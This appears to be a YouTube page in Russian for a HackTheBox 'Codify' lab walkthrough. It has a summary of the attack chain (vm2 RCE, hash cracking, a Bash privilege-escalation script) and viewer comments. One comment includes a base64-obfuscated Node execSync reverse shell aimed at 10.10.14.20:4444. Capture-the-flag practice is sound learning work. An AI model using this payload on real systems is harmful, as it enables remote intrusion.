Прохождение
ฝัง
- เผยแพร่เมื่อ 20 ต.ค. 2024
- Как решить машину CODIFY на HackTheBox?
Codify - это легкая Linux-машина, на которой установлено веб-приложение, позволяющее пользователям тестировать код `Node.js`. Приложение использует уязвимую библиотеку `vm2`, которая используется для удаленного выполнения кода. По мере исследования цели обнаруживается база данных `SQLite`, содержащая хэш, который, будучи взломанным, дает `SSH`-доступ к устройству. Наконец, уязвимый скрипт `Bash` может быть запущен с повышенными привилегиями для раскрытия пароля пользователя `root`, что приводит к получению привилегированного доступа к машине.
------------------------------------------------------------------------------------------------------
Мои статьи и врайтапы: maddevs.io/blo...
Заказать услуги: maddevs.io/cyb...
Telegram чат: t.me/+ls1duJay...
Telegram канал: t.me/MrCyberSe...
Boosty.to: boosty.to/mrcy...
X/Twitter: / _mrcybersec
HackTheBox: app.hackthebox...
LinkedIn: / mekan-bairyev
#VulnerabilityAssessment #WebApplication #SourceCodeAnalysis #Cryptography #Programming #injections #software #exploitation #idor #RemoteCodeExecution #RCE #Misconfiguration #python #sql #ReverseEngineering
Редко пишу комменты, но это супер крутой контент. У меня появилось новое хобби)) Большое спасибо за проделанную работу.
Привет!! Очень классный канал, подача контента, прошу не забрасывайте его)))
Я двухлетний девопс (бубернетесы ваши, пайплайны, автоматизация и.т.д), но с большим интересом смотрю в сетевую безопасность, пентест и всякие другие возможности вскрывания жоп. С интересом буду наблюдать за каналом
ровно такая же история))
Про бесплатные машины тоже расскажи. Контент супер!
посмотрев другие видео, имя пользователя joshua в хэше сразу смутило )
контент топ, случайно нашел, оооочень доступно объясняется. спасибо.
замечательно, продолжай то, что ты делаешь!!!
просто кайф, больше таких видео!
Классный контент , продолжай в том же духе
классно 🎉
Шикарный контент!
Продолжай в том же духе, отличный контент!
прикольно давай еще
Красавчик
Классное видео. Можете пожалуйста подсказать что у вас за клавиатура и на каких свичах? Очень классно звучит 😍
плюсую, тоже заинтересовало)
Спасибо!
Клава: Keychron K8 Pro QMK
Свичи: Gateron G Pro Brown
Большое спасибо!
Не чего непонял, но залип
Скажите, а почему именно vim? почему нельзя использовать тотже nano? Или любые другие редакторы? Ну не прям "нельзя", а почему именно vim? Большая чать людей говорят - "Это олдсулько, профессионально и прочие симптомы" но никто не говорит почему все же vim. Есть ли у Вас свое мнение по этому вопросу?
Почему нельзя? Можно. Дело вкуса и привычек. Используйте нано, если нравится, это асболютно ОК.
Вим предоставляет очень удобное управление командами и хоткеями. И если в них разобраться, то скорость работы очень увеличится
А зачем вы делаете перебор пароля DB_PATH? Можно же просто написать sudo bash и делать что хотите (ну или sudo cat /root/.creds)
Из под sudo можно запускать лишь скрипт бекапа, это видно из аутпута команды sudo -l
Нужны ли углубленные знания по математике для инфо беза?
Скажу так: если нет углубленных знаний в математике, то это ниразу не повод отказываться преследовать путь инфобеза. Тут скорее про логическое мышление, чем про математику. Логику же развивать можно. Программирование - отличный способ!
откуда такое условие что charset для пароля только латинские буквы и цифры? где спецсимволы?
Что то на инопланетном языке.. наверное вы рассказывали, какой я тупой в .. хрен знает в чём))
почему пароль от рута совпал с паролем от дб? ето и есть уязвимость?пароль один?
Пароль от дб совпал с паролем от рута, но нам демонстрировали другое. Уязвимость в возможности эксфильтровать этот самый пароль из-за корявого условия проверки пользовательского пароля с паролем из файла /root/.creds
@@MrCyberSec ето я понял в bash script нельзя проверку через == делать. Просто если б пароль дб не совпал с паролем рута нужно было б продолжать что-то другое.
@@igorvlasiuk6432 Да, но в данном случае нам хотели продемонстрировать именно эту уязвимость и, так образом подведя к итогу машины. Есть машины сложнее уровнем и там так легко машины не заканчиваются:)
Can you provide penetrating test report for codify please 🙂
Yes, my writeup is here: maddevs.io/writeups/hackthebox-codify/
@@MrCyberSec I opened brother , but it shows like
An error occurred in the application and your page could not be served. If you are the application owner, check your logs for details.
@@kakarot2004-l2 which country are you accessing it from? Might be your ISP blocking.. Try opening it with VPN. I recommend using CloudFlare WARP technology. It's free and secures your internet connection.
@@MrCyberSec india brother
@@MrCyberSec which server did i want to choose?
кароч не было там папки .ssh ((
создал сам записал ключ - не коннектит
сделал шел с .execSync('echo c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMjAvNDQ0NCAwPiYx | base64 -d | bash'); где в хеше по сути sh -i >& /dev/tcp/10.10.14.20/4444 0>&1
зайти зашел и записал еще раз уже другой ключ
но не коннектит ссх -
с вербозом вот
debug1: Authentications that can continue: publickey,password
debug1: Next authentication method: password
странно почему у вас была .ssh папка
и по идее после изменения authorized_keys нужно делать ребут sshd разве нет?